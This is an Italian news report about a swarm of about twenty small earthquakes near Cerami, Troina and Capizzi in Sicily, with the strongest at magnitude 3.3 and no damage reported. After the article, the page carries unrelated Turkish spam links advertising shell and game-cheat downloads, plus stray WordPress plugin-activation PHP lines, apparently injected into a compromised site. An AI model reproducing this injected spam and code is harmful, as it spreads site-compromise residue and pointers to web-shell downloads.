Terremoto, 20 scosse registrate tra Cerami e Troina: la più forte 3.3


ROMA – Una scossa di magnitudo 3.2 è stata registrata dall’Istituto Nazionale di Geofisica e Vulcanologia al confine tra la provincia di Messina e di Enna. I comuni più vicini all’epicentro del terremoto, avvenuto ad un profondità di 36 chilometri nel parco dei Nebrodi, sono Capizzi, Cerami e Troina. 

Le scosse, in una vera e propria sequenza sismica, sono iniziate alle 5:50 di ieri e ne sono state registrate almeno 20 (considerando solo quelle di magnitudo uguale o superiore a 2), l’ultima delle quali alle 22:14. La più forte è stata di magnitudo 3.3, avvenuta alle 14:29. Non si segnalano danni a persone o cose.

COPYRIGHT LASICILIA.IT © RIPRODUZIONE RISERVATA

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Shell İndir Oyun İndir Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );